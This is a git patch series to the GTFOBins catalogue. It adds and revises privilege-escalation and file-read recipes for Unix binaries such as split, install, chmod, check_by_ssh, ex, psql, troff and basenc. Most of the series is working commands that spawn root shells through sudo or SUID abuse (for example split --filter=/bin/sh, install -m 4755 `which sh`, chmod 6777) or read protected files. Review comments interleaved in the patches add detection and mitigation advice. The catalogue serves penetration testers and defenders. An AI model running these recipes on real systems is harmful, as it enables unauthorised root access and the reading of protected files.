b/_gtfobins/troff.md @@ -5,13 +5,13 @@ functions: file-read: - code: | LFILE=file_to_read - troff "$LFILE" + troff $LFILE suid: - code: | LFILE=file_to_read - ./troff "$LFILE" + ./troff $LFILE sudo: - code: | LFILE=file_to_read - sudo troff "$LFILE" + sudo troff $LFILE --- diff --git a/_gtfobins/xmodmap.md b/_gtfobins/xmodmap.md index 8c32456..8d23cb1 100644 --- a/_gtfobins/xmodmap.md +++ b/_gtfobins/xmodmap.md @@ -5,13 +5,13 @@ functions: file-read: - code: | LFILE=file_to_read - xmodmap -v "$LFILE" + xmodmap -v $LFILE suid: - code: | LFILE=file_to_read - ./xmodmap -v "$LFILE" + ./xmodmap -v $LFILE sudo: - code: | LFILE=file_to_read - sudo xmodmap -v "$LFILE" + sudo xmodmap -v $LFILE --- From f3dfd7a50cc5cf4e4cbb70f796abb54dc13bd718 Mon Sep 17 00:00:00 2001 
From: Emanuel Duss Date: Fri, 13 Nov 2020 11:57:13 +0100 Subject: [PATCH 20/43] Added nroff file read
--- _gtfobins/nroff.md | 5 +++++ 1 file changed, 5 insertions(+)
diff --git a/_gtfobins/nroff.md b/_gtfobins/nroff.md
index f7fb52c..38cc263 100644
--- a/_gtfobins/nroff.md
+++ b/_gtfobins/nroff.md
@@ -1,5 +1,10 @@ --- functions: + file-read: + - description: The read file content is corrupted by arbitrary newlines. + code: | + LFILE=file_to_read + nroff $LFILE shell: - code: | TF=$(mktemp -d)
From 2ee9d7a93432cb95f09bd07cdfc3557bdc7d28a3 Mon Sep 17 00:00:00 2001 From: Emanuel Duss Date: Fri, 13 Nov 2020 11:58:00 +0100 Subject: [PATCH 21/43] New command: basenc
--- _gtfobins/basenc.md | 15 +++++++++++++++ 1 file changed, 15 insertions(+) create mode 100644 _gtfobins/basenc.md
diff --git a/_gtfobins/basenc.md b/_gtfobins/basenc.md new file mode 100644
index 0000000..b8f2a59
--- /dev/null
+++ b/_gtfobins/basenc.md
@@ -0,0 +1,15 @@
+---
+functions:
+ file-read:
+ - code: |
+ LFILE=file_to_read
+ basenc --base16 $LFILE | basenc -d --base16
+ suid:
+ - code: |
+ LFILE=file_to_read
+ basenc --base16 $LFILE | basenc -d --base16
+ sudo:
+ - code: |
+ LFILE=file_to_read
+ sudo basenc --base16 $LFILE | basenc -d --base16
+---
From 55b7296d8ee0a0ea9c1eb3c850d18298b885ba2c Mon Sep 17 00:00:00 2001 From: Emanuel Duss Date: Fri, 13 Nov 2020 11:59:14 +0100 Subject: [PATCH 22/43] New command: comm
--- _gtfobins/comm.md | 15 +++++++++++++++ 1 file changed, 15 insertions(+) create mode 100644 _gtfobins/comm.md
diff --git a/_gtfobins/comm.md b/_gtfobins/comm.md new file mode 100644
index 0000000..29551d9
--- /dev/null
+++ b/_gtfobins/comm.md
@@ -0,0 +1,15 @@
+---
+functions:
+ file-read:
+ - code: |
+ LFILE=file_to_read
+ comm $LFILE /dev/null 2>/dev/null
+ suid:
+ - code: |
+ LFILE=file_to_read
+ comm $LFILE /dev/null 2>/dev/null
+ sudo:
+ - code: |
+ LFILE=file_to_read
+ sudo comm $LFILE /dev/null 2>/dev/null
+---
From 5a3e672d23abf11588be7cb61931b1d447546f31 Mon Sep 17 00:00:00 2001 From: Emanuel Duss Date: Fri, 13 Nov 2020 11:59:14 +0100 Subject: [PATCH 23/43] New command: csplit
--- _gtfobins/csplit.md | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 _gtfobins/csplit.md
diff --git a/_gtfobins/csplit.md b/_gtfobins/csplit.md new file mode 100644
index 0000000..7b8927c
--- /dev/null
+++ b/_gtfobins/csplit.md
@@ -0,0 +1,18 @@
+---
+functions:
+ file-read:
+ - code: |
+ LFILE=file_to_read
+ csplit $LFILE 1
+ cat xx01
+ suid:
+ - code: |
+ LFILE=file_to_read
+ csplit $LFILE 1
+ cat xx01
+ sudo:
+ - code: |
+ LFILE=file_to_read
+ csplit $LFILE 1
+ cat xx01
+---
From 146b146cd3b8d80bbb4d6525a8ddd87926e535c3 Mon Sep 17 00:00:00 2001 From: Emanuel Duss Date: Fri, 13 Nov 2020 11:59:14 +0100 Subject: [PATCH 24/43] New command: install
--- _gtfobins/install.md | 13 +++++++++++++ 1 file changed, 13 insertions(+) create mode 100644 _gtfobins/install.md
diff --git a/_gtfobins/install.md b/_gtfobins/install.md new file mode 100644
index 0000000..a6c9297
--- /dev/null
+++ b/_gtfobins/install.md
@@ -0,0 +1,13 @@
+---
+functions:
+ suid:
+ - code: |
+ TF=$(mktemp)
+ install -m 4755 $TF
+ $TF -p
+ sudo:
+ - code: |
+ TF=$(mktemp)
+ sudo install -m 4755 $TF
+ $TF -p
+---
From 9e593b6ac0e494549d0d179b7838b81bfa68708b Mon Sep 17 00:00:00 2001 From: Emanuel Duss Date: Fri, 13 Nov 2020 11:59:14 +0100 Subject: [PATCH 25/43] New command: join
--- _gtfobins/join.md | 15 +++++++++++++++ 1 file changed, 15 insertions(+) create mode 100644 _gtfobins/join.md
diff --git a/_gtfobins/join.md b/_gtfobins/join.md new file mode 100644
index 0000000..50dff52
--- /dev/null
+++ b/_gtfobins/join.md
@@ -0,0 +1,15 @@
+---
+functions:
+ file-read:
+ - code: |
+ LFILE=file_to_read
+ join -a 2 /dev/null $LFILE
+ suid:
+ - code: |
+ LFILE=file_to_read
+ join -a 2 /dev/null $LFILE
+ sudo:
+ - code: |
+ LFILE=file_to_read
+ sudo join -a 2 /dev/null $LFILE
+---
From 28b67bdfd57ca849c05eefb811a480fbb9750dbf Mon Sep 17 00:00:00 2001 From: Emanuel Duss Date: Fri, 13 Nov 2020 11:59:14 +0100 Subject: [PATCH 26/43] New command: paste
--- _gtfobins/paste.md | 15 +++++++++++++++ 1 file changed, 15 insertions(+) create mode 100644 _gtfobins/paste.md
diff --git a/_gtfobins/paste.md b/_gtfobins/paste.md new file mode 100644
index 0000000..dd84bcb
--- /dev/null
+++ b/_gtfobins/paste.md
@@ -0,0 +1,15 @@
+---
+functions:
+ file-read:
+ - code: |
+ LFILE=file_to_read
+ paste $LFILE
+ suid:
+ - code: |
+ LFILE=file_to_read
+ paste $LFILE
+ sudo:
+ - code: |
+ LFILE=file_to_read
+ sudo paste $LFILE
+---
From c88e461484454cb7f5e8bd360fe010d330c50efd Mon Sep 17 00:00:00 2001 From: Emanuel Duss Date: Fri, 13 Nov 2020 11:59:14 +0100 Subject: [PATCH 27/43] New command: pr
--- _gtfobins/pr.md | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) create mode 100644 _gtfobins/pr.md
diff --git a/_gtfobins/pr.md b/_gtfobins/pr.md new file mode 100644
index 0000000..248c961
--- /dev/null
+++ b/_gtfobins/pr.md
@@ -0,0 +1,17 @@
+---
+description: |
+ The read file content is corrupted by additional output.
+functions:
+ file-read:
+ - code: |
+ LFILE=file_to_read
+ pr $LFILE
+ suid:
+ - code: |
+ LFILE=file_to_read
+ pr $LFILE
+ sudo:
+ - code: |
+ LFILE=file_to_read
+ pr $LFILE
+---
From cb7cb672f26ac2f5e06c7bcf4f4ed4f52ff23535 Mon Sep 17 00:00:00 2001 From: Emanuel Duss Date: Fri, 13 Nov 2020 11:59:14 +0100 Subject: [PATCH 28/43] New command: split
--- _gtfobins/split.md | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 _gtfobins/split.md
diff --git a/_gtfobins/split.md b/_gtfobins/split.md new file mode 100644
index 0000000..cd805c6
--- /dev/null
+++ b/_gtfobins/split.md
@@ -0,0 +1,27 @@
+---
+functions:
+ file-read:
+ - code: |
+ LFILE=file_to_read
+ TF=$(mktemp)
+ split $LFILE $TF
+ cat $TF*
+ command:
+ - description: Command execution using an existing or new created file.
+ - code: |
+ COMMAND=id
+ TF=$(mktemp)
+ split --filter=$COMMAND $TF
+ - description: Command execution using stdin (and close it directly).
+ code: |
+ COMMAND=id
+ echo | split --filter=$COMMAND /dev/stdin
+ shell:
+ - code: |
+ split --filter=bash /dev/stdin
+ sudo:
+ - code: |
+ split --filter=bash /dev/stdin
+---
+
+

From de10e4761e05be39fc1b4aa4ade51b862c038f44 Mon Sep 17 00:00:00 2001
From: Emanuel Duss
Date: Fri, 13 Nov 2020 12:09:04 +0100
Subject: [PATCH 29/43] Added missing shell file

---
 _gtfobins/install.md | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/_gtfobins/install.md b/_gtfobins/install.md
index a6c9297..9fad402 100644
--- a/_gtfobins/install.md
+++ b/_gtfobins/install.md
@@ -3,11 +3,11 @@ functions:
 suid:
 - code: |
 TF=$(mktemp)
- install -m 4755 $TF
+ install -m 4755 `which sh` $TF
 $TF -p
 sudo:
 - code: |
 TF=$(mktemp)
- sudo install -m 4755 $TF
+ sudo install -m 4755 `which sh` $TF
 $TF -p
 ---

From 286775860abebcc9c2344f95113566d59bac0390 Mon Sep 17 00:00:00 2001
From: Emanuel Duss
Date: Fri, 13 Nov 2020 12:12:08 +0100
Subject: [PATCH 30/43] Fixed syntax error

---
 _gtfobins/split.md | 4 +---
 1 file changed, 1 insertion(+), 3 deletions(-)

diff --git a/_gtfobins/split.md b/_gtfobins/split.md
index cd805c6..c51cd22 100644
--- a/_gtfobins/split.md
+++ b/_gtfobins/split.md
@@ -8,7 +8,7 @@ functions:
 cat $TF*
 command:
 - description: Command execution using an existing or new created file.
- - code: |
+ code: |
 COMMAND=id
 TF=$(mktemp)
 split --filter=$COMMAND $TF
@@ -23,5 +23,3 @@ functions:
 - code: |
 split --filter=bash /dev/stdin
 ---
-
-

From ee8cce63f925d45816c662b0a96e9e6d96819d62 Mon Sep 17 00:00:00 2001
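Review bot: Nothing in the new split entry explains what `--filter=` is or where it comes from: GNU coreutils hands each output piece to the given command through the shell, reading the piece on the command's stdin, and the option is a GNU extension that POSIX `split` does not define, so the `command`, `shell` and `sudo` recipes in this hunk only apply to GNU coreutils. A `description:` line such as `--filter is a GNU coreutils extension; the command is run by the shell once for each output piece.` would make the scope of the entry clear to readers. For defenders, a `split` invocation whose `--filter=` value names a shell or an arbitrary command interpreter is a reasonable thing to alert on in command-line auditing, and the entry is a good place to say so.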
From: Andrea Cardaci
Date: Sun, 20 Dec 2020 19:32:15 +0100
Subject: [PATCH 31/43] Replace command with shell in check_by_ssh

---
 _gtfobins/check_by_ssh.md | 20 +++++---------------
 1 file changed, 5 insertions(+), 15 deletions(-)

diff --git a/_gtfobins/check_by_ssh.md b/_gtfobins/check_by_ssh.md
index e00730e..5660689 100644
--- a/_gtfobins/check_by_ssh.md
+++ b/_gtfobins/check_by_ssh.md
@@ -2,20 +2,10 @@
 description: |
 This is the `check_by_ssh` Nagios plugin, available e.g. in `/usr/lib/nagios/plugins/`.
 functions:
- command:
- - code: |
- COMMAND=id
- OUTPUT=output_file
- TF=$(mktemp)
- echo "ProxyCommand $COMMAND | tee $OUTPUT" > $TF
- check_by_ssh -F $TF -H localhost -C something
- cat $OUTPUT
+ shell:
+ - description: The shell will only last 10 seconds.
+ code: check_by_ssh -o "ProxyCommand /bin/sh -i <$(tty) |& tee $(tty)" -H localhost -C xx
 sudo:
- - code: |
- COMMAND=id
- OUTPUT=output_file
- TF=$(mktemp)
- echo "ProxyCommand $COMMAND | tee $OUTPUT" > $TF
- sudo check_by_ssh -F $TF -H localhost -C something
- cat $OUTPUT
+ - description: The shell will only last 10 seconds.
+ code: sudo check_by_ssh -o "ProxyCommand /bin/sh -i <$(tty) |& tee $(tty)" -H localhost -C xx
 ---

From 4b2100bfae177ee4fc3232c65a46c1eb9b5f3205 Mon Sep 17 00:00:00 2001
From: Andrea Cardaci
Date: Sun, 20 Dec 2020 19:53:16 +0100
Subject: [PATCH 32/43] Fix check_log

---
 _gtfobins/check_log.md | 5 ++---
 1 file changed, 2 insertions(+), 3 deletions(-)

diff --git a/_gtfobins/check_log.md b/_gtfobins/check_log.md
index 023cdbd..40fd225 100644
--- a/_gtfobins/check_log.md
+++ b/_gtfobins/check_log.md
@@ -11,12 +11,11 @@ functions:
 file-write:
 - code: |
 LFILE=file_to_write
- INPUT=output_file
+ INPUT=input_file
 check_log -F $INPUT -O $LFILE
 sudo:
 - code: |
 LFILE=file_to_write
- INPUT=output_file
- umask 022
+ INPUT=input_file
 sudo check_log -F $INPUT -O $LFILE
 ---

From dc3de20e8437220049149409ff3c982795da2ef3 Mon Sep 17 00:00:00 2001
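Review bot: The new `code:` lines pass an arbitrary ssh option string through `-o`, which is the whole reason the plugin turns into a shell, yet the `description:` only records that the shell lasts 10 seconds and says nothing about the root cause. The existing `description: |` block at the top of the file is the right place to state it, e.g. `Arbitrary ssh options, including ProxyCommand, can be supplied with -o, so a sudo rule for this plugin that lets the caller choose its arguments is equivalent to granting a shell.` That sentence also tells administrators what the mitigation is, namely pinning the plugin's arguments in the sudoers entry rather than allowing free-form invocation.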
From: Andrea Cardaci
Date: Sun, 20 Dec 2020 19:57:16 +0100
Subject: [PATCH 33/43] Add note about column

---
 _gtfobins/column.md | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/_gtfobins/column.md b/_gtfobins/column.md
index af67980..80a173c 100644
--- a/_gtfobins/column.md
+++ b/_gtfobins/column.md
@@ -1,4 +1,6 @@
 ---
+description: |
+ `column` expects textual data.
 functions:
 file-read:
 - code: |

From 6a6485c44b204e7cebb8ebeb93d8a353bf7692c9 Mon Sep 17 00:00:00 2001
From: Andrea Cardaci
Date: Sun, 20 Dec 2020 20:13:01 +0100
Subject: [PATCH 34/43] Fix ex shell path and remove suid

---
 _gtfobins/ex.md | 8 ++------
 1 file changed, 2 insertions(+), 6 deletions(-)

diff --git a/_gtfobins/ex.md b/_gtfobins/ex.md
index 1029504..49ebb37 100644
--- a/_gtfobins/ex.md
+++ b/_gtfobins/ex.md
@@ -3,7 +3,7 @@ functions:
 shell:
 - code: |
 ex
- !sh
+ !/bin/sh
 file-write:
 - code: |
 ex file_to_write
@@ -20,9 +20,5 @@ functions:
 sudo:
 - code: |
 sudo ex
- !sh
- suid:
- - code: |
- ./ex
- !sh -p
+ !/bin/sh
 ---

From 5102eccdfcc0a99fdc5d71b19b7685522fbf4772 Mon Sep 17 00:00:00 2001
From: Andrea Cardaci
Date: Sun, 20 Dec 2020 20:13:01 +0100
Subject: [PATCH 35/43] Fix psql shell path and remove suid

---
 _gtfobins/psql.md | 10 +++-------
 1 file changed, 3 insertions(+), 7 deletions(-)

diff --git a/_gtfobins/psql.md b/_gtfobins/psql.md
index ae7b794..40ca33f 100644
--- a/_gtfobins/psql.md
+++ b/_gtfobins/psql.md
@@ -1,18 +1,14 @@
 ---
+description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
 functions:
 shell:
 - code: |
 psql
 \?
- !sh
- suid:
- - code: |
- psql
- \?
- !sh -p
+ !/bin/sh
 sudo:
 - code: |
 psql
 \?
- !sh
+ !/bin/sh
 ---

From 54c20a1349d9bee39ec7c0bac21aefaef92ff338 Mon Sep 17 00:00:00 2001
From: Andrea Cardaci
Date: Sun, 20 Dec 2020 20:41:49 +0100
Subject: [PATCH 36/43] Improve the description of ss

---
 _gtfobins/ss.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/_gtfobins/ss.md b/_gtfobins/ss.md
index 28d4bce..62d863e 100644
--- a/_gtfobins/ss.md
+++ b/_gtfobins/ss.md
@@ -1,6 +1,6 @@
 ---
 description: |
- The read file content is limited to the first line and corrupted by an error message.
+ The file content is actually parsed so only a part of the first line is returned as a part of an error message.
 functions:
 file-read:
 - code: |

From dd16d538ce8d216bf63d3092aaeabc7837f4cf12 Mon Sep 17 00:00:00 2001
From: Andrea Cardaci
Date: Sun, 20 Dec 2020 20:44:24 +0100
Subject: [PATCH 37/43] Improve the description of ssh-keyscan

---
 _gtfobins/ssh-keyscan.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/_gtfobins/ssh-keyscan.md b/_gtfobins/ssh-keyscan.md
index e5bb84c..e113ca5 100644
--- a/_gtfobins/ssh-keyscan.md
+++ b/_gtfobins/ssh-keyscan.md
@@ -1,6 +1,6 @@
 ---
 description: |
- The read file content is corrupted by error prints.
+ The file content is actually parsed so only a part of each line is returned as a part of an error message.
 functions:
 file-read:
 - code: |

From b05a84474b93939962c5aed2cf1fdee0af1a357a Mon Sep 17 00:00:00 2001
From: Andrea Cardaci
Date: Sun, 20 Dec 2020 20:48:00 +0100
Subject: [PATCH 38/43] Improve the description of troff

---
 _gtfobins/troff.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/_gtfobins/troff.md b/_gtfobins/troff.md
index 52a2bdc..a48f957 100644
--- a/_gtfobins/troff.md
+++ b/_gtfobins/troff.md
@@ -1,6 +1,6 @@
 ---
 description: |
- The read file content is corrupted by error prints.
+ The file is typeset but text is still readable in the output, alternatively the output can be read with `man -l`.
 functions:
 file-read:
 - code: |

From 7cfac08921b4d170ef754ef9a5888bf10e8253ef Mon Sep 17 00:00:00 2001
From: Andrea Cardaci
Date: Sun, 20 Dec 2020 20:54:05 +0100
Subject: [PATCH 39/43] Improve the description of nroff

---
 _gtfobins/nroff.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/_gtfobins/nroff.md b/_gtfobins/nroff.md
index 38cc263..05d6b70 100644
--- a/_gtfobins/nroff.md
+++ b/_gtfobins/nroff.md
@@ -1,7 +1,7 @@
 ---
 functions:
 file-read:
- - description: The read file content is corrupted by arbitrary newlines.
+ - description: The file is typeset and some warning messages may appear.
 code: |
 LFILE=file_to_read
 nroff $LFILE

From c6502e8ddcfb48a60036f879f0d863e602c3cac1 Mon Sep 17 00:00:00 2001
From: Andrea Cardaci
Date: Sun, 20 Dec 2020 20:59:40 +0100
Subject: [PATCH 40/43] Use base64 in basenc

---
 _gtfobins/basenc.md | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/_gtfobins/basenc.md b/_gtfobins/basenc.md
index b8f2a59..0a9f6ca 100644
--- a/_gtfobins/basenc.md
+++ b/_gtfobins/basenc.md
@@ -3,13 +3,13 @@ functions:
 file-read:
 - code: |
 LFILE=file_to_read
- basenc --base16 $LFILE | basenc -d --base16
+ basenc --base64 $LFILE | basenc -d --base64
 suid:
 - code: |
 LFILE=file_to_read
- basenc --base16 $LFILE | basenc -d --base16
+ basenc --base64 $LFILE | basenc -d --base64
 sudo:
 - code: |
 LFILE=file_to_read
- sudo basenc --base16 $LFILE | basenc -d --base16
+ sudo basenc --base64 $LFILE | basenc -d --base64
 ---

From 2475ea0a5ae3984bc9654645a542b6544510148d Mon Sep 17 00:00:00 2001
From: Andrea Cardaci
Date: Sun, 20 Dec 2020 21:09:50 +0100
Subject: [PATCH 41/43] Improve pr

---
 _gtfobins/pr.md | 9 ++++-----
 1 file changed, 4 insertions(+), 5 deletions(-)

diff --git a/_gtfobins/pr.md b/_gtfobins/pr.md
index 248c961..a497a67 100644
--- a/_gtfobins/pr.md
+++ b/_gtfobins/pr.md
@@ -1,17 +1,16 @@
 ---
-description: |
- The read file content is corrupted by additional output.
+description: Some bytes are altered so it might not be suitable for binary files.
 functions:
 file-read:
 - code: |
 LFILE=file_to_read
- pr $LFILE
+ pr -T $LFILE
 suid:
 - code: |
 LFILE=file_to_read
- pr $LFILE
+ pr -T $LFILE
 sudo:
 - code: |
 LFILE=file_to_read
- pr $LFILE
+ pr -T $LFILE
 ---
From fbe4b4289099da6b9b123852ac6186debcfd6c71 Mon Sep 17 00:00:00 2001
From: Andrea Cardaci
Date: Sun, 20 Dec 2020 21:15:58 +0100
Subject: [PATCH 42/43] Improve split

---
 _gtfobins/split.md | 12 +++++++-----
 1 file changed, 7 insertions(+), 5 deletions(-)

diff --git a/_gtfobins/split.md b/_gtfobins/split.md
index c51cd22..297bdb1 100644
--- a/_gtfobins/split.md
+++ b/_gtfobins/split.md
@@ -7,7 +7,7 @@ functions:
 split $LFILE $TF
 cat $TF*
 command:
- - description: Command execution using an existing or new created file.
+ - description: Command execution using an existing or newly created file.
 code: |
 COMMAND=id
 TF=$(mktemp)
@@ -17,9 +17,11 @@ functions:
 COMMAND=id
 echo | split --filter=$COMMAND /dev/stdin
 shell:
- - code: |
- split --filter=bash /dev/stdin
+ - description: The shell prompt is not printed.
+ code: |
+ split --filter=/bin/sh /dev/stdin
 sudo:
- - code: |
- split --filter=bash /dev/stdin
+ - description: The shell prompt is not printed.
+ code: |
+ split --filter=/bin/sh /dev/stdin
 ---

From c80e83c3c59ca6734c40476ddf1415a041d340ae Mon Sep 17 00:00:00 2001
From: Andrea Cardaci
Date: Sun, 20 Dec 2020 21:23:28 +0100
Subject: [PATCH 43/43] Make install similar to chmod

---
 _gtfobins/chmod.md | 6 +++---
 _gtfobins/install.md | 9 +++++----
 2 files changed, 8 insertions(+), 7 deletions(-)

diff --git a/_gtfobins/chmod.md b/_gtfobins/chmod.md
index 61e3361..0fc3dde 100644
--- a/_gtfobins/chmod.md
+++ b/_gtfobins/chmod.md
@@ -1,12 +1,12 @@
 ---
-description: This can be run with elevated privileges to change permissions and then read, write, or execute a file.
+description: This can be run with elevated privileges to change permissions (`6` denotes the SUID bits) and then read, write, or execute a file.
 functions:
 suid:
 - code: |
 LFILE=file_to_change
- ./chmod 0777 $LFILE
+ ./chmod 6777 $LFILE
 sudo:
 - code: |
 LFILE=file_to_change
- sudo chmod 0777 $LFILE
+ sudo chmod 6777 $LFILE
 ---
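Review bot: The new chmod description says `6` denotes the SUID bits, but in the leading octal digit 6 is setuid (4) plus setgid (2), so mode `6777` sets both the SUID and the SGID bit and the trailing `777` additionally leaves the file world-readable, -writable and -executable; the parenthesis should read something like `(the leading 6 sets both the SUID and SGID bits; 777 also makes the file world-writable)`. The identical sentence is added to `_gtfobins/install.md` in the next hunk and needs the same correction there. For responders the resulting mode is a distinctive artefact: `find / -perm -6000 -type f` lists files carrying both bits, and comparing that output against a known baseline is a cheap way to spot files altered this way.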
diff --git a/_gtfobins/install.md b/_gtfobins/install.md
index 9fad402..a10c425 100644
--- a/_gtfobins/install.md
+++ b/_gtfobins/install.md
@@ -1,13 +1,14 @@
 ---
+description: This can be run with elevated privileges to change permissions (`6` denotes the SUID bits) and then read, write, or execute a copy of the file.
 functions:
 suid:
 - code: |
+ LFILE=file_to_change
 TF=$(mktemp)
- install -m 4755 `which sh` $TF
- $TF -p
+ ./install -m 6777 $LFILE $TF
 sudo:
 - code: |
+ LFILE=file_to_change
 TF=$(mktemp)
- sudo install -m 4755 `which sh` $TF
- $TF -p
+ sudo install -m 6777 $LFILE $TF
 ---